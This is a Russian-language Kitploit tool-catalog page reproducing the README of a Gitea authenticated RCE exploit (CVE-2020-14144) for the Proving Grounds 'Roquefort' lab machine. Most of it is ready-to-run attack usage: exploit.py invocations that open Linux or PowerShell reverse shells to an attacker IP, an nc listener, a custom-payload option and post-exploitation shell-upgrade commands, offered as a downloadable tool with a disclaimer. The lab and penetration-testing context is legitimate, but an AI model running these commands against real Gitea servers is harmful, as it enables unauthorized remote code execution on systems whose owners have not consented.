Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Gitea-Git-Hooks-RCE-CVE-2020-14144- — Gitea версий 1.1.0 → 1.12.5 позволяют аутентифицированным пользователям с разрешением «Может создавать git-хуки» внедрять произвольные shell-команды в хуки post-receive. Отправка коммита запускает хук и выполняет полезную нагрузку на сервере. | Kitploit
Инструменты/GitHubGitHub/mohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubmohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-

Gitea-Git-Hooks-RCE-CVE-2020-14144-

Gitea версий 1.1.0 → 1.12.5 позволяют аутентифицированным пользователям с разрешением «Может создавать git-хуки» внедрять произвольные shell-команды в хуки post-receive. Отправка коммита запускает хук и выполняет полезную нагрузку на сервере.

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RCE через Git Hooks в Gitea (CVE-2020-14144)

Практика OffsecProvingGrounds — Разбор машины Roquefort и PoC

Обзор

ПунктДетали
МашинаRoquefort (Proving Grounds Practice)
ОСLinux
Версия Gitea1.7.5
CVECVE-2020-14144
ВекторАутентифицированное RCE через Git Hooks
Пользовательchloe

Версии Gitea с 1.1.0 по 1.12.5 позволяют аутентифицированным пользователям с разрешением "Может создавать git-хуки" внедрять произвольные команды оболочки в хуки post-receive. Отправка коммита запускает хук и выполняет полезную нагрузку на сервере.

Быстрый старт

Автоматизированный (Python-скрипт)

root@kitploit:~
# Linux target — reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os linux

# Windows target — PowerShell reverse shell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os windows

Ручной способ

Смотрите MANUAL.md для пошагового руководства по эксплуатации.

Структура репозитория

root@kitploit:~
.
├── README.md          # This file
├── MANUAL.md          # Manual exploitation guide (Linux + Windows)
└── exploit.py         # Automated exploit script

Требования

  • Python 3.6+
  • библиотека requests (pip install requests)
  • установленный git на машине атакующего
  • Действительные учетные данные Gitea с разрешениями на git-хуки

Использование

root@kitploit:~
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -I REV_IP -P REV_PORT
                  [--os {linux,windows}] [--repo REPO] [-f PAYLOAD_FILE] [-v]

Roquefort — Gitea Authenticated RCE via Git Hooks (CVE-2020-14144)

required arguments:
  -t, --target       Target Gitea URL (e.g. http://192.168.x.x:3000)
  -u, --username     Gitea username
  -p, --password     Gitea password
  -I, --rev-ip       Attacker listener IP
  -P, --rev-port     Attacker listener port

optional arguments:
  --os               Target OS: linux (default) or windows
  --repo             Repository name to create (default: exploit)
  -f, --payload-file Custom shell script payload file
  -v, --verbose      Verbose output

Примеры

root@kitploit:~
# 1) Start listener
nc -lvnp 4444

# 2) Run exploit (Linux target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444

# 3) Run exploit (Windows target)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 --os windows

# 4) Custom payload file
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 -f payload.sh

Повышение оболочки (Постэксплуатация)

После получения обратной оболочки:

root@kitploit:~
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg

Устранение неполадок

ПроблемаРешение
fatal: dubious ownershipКлонируйте из ~ вместо общих папок, или выполните git config --global --add safe.directory '*'
Нет входящего соединенияПроверьте IP атакующего, настройки брандмауэра, убедитесь, что обе машины в одной подсети
Хук срабатывает, но оболочка не появляетсяСначала протестируйте с полезной нагрузкой touch /tmp/pwned — если файл появляется, значит обратная оболочка блокируется
Отказано в доступе к хукамУ пользователя нет прав на хуки — требуется администратор или привилегия "Может создавать git-хуки"
Конфликт портов на 3000Gitea использует порт 3000 — используйте другой порт, например 4444, для вашего слушателя

Ссылки

  • CVE-2020-14144 — NVD
  • Gitea Issue #13058
  • p0dalirius Оригинальный PoC

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования на проникновение и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Используйте ответственно.

Скачать инструмент